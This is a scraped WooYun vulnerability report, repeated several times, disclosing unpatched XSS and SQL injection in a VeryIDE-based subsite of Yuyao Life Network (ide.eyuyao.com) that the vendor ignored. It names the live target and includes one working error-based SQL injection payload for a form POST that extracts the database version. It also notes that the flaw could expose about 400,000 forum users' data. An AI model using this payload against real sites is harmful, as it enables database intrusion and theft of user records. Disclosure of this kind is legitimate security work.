余姚生活网某系统补丁不及时存在xss+sql注射

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063519

漏洞标题：余姚生活网某系统补丁不及时存在xss+sql注射

漏洞作者：路人甲

提交时间：2014-06-04 17:27

修复时间：2014-09-02 17:30

公开时间：2014-09-02 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-09-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

余姚生活网某分站补丁不及时存在xss和注入

详细说明：

余姚生活网旗下网站ide.eyuyao.com实用veryide系统，由于更新不及时存在xss个sql注入
该系统可以与论坛绑定，该系统与论坛不在同服务器，论坛数据库应该开启了外联，可造成论坛40W用户数据
漏洞相关： WooYun: VeryIDE互动营销平台一系列问题，N多门户、地方网站中招
表单POST注入：

1',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select version())),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063519

漏洞标题：余姚生活网某系统补丁不及时存在xss+sql注射

相关厂商：余姚生活网

漏洞作者：路人甲

提交时间：2014-06-04 17:27

修复时间：2014-09-02 17:30

公开时间：2014-09-02 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063519

漏洞标题：余姚生活网某系统补丁不及时存在xss+sql注射

相关厂商：余姚生活网

漏洞作者： 路人甲

提交时间：2014-06-04 17:27

修复时间：2014-09-02 17:30

公开时间：2014-09-02 17:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-063519"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云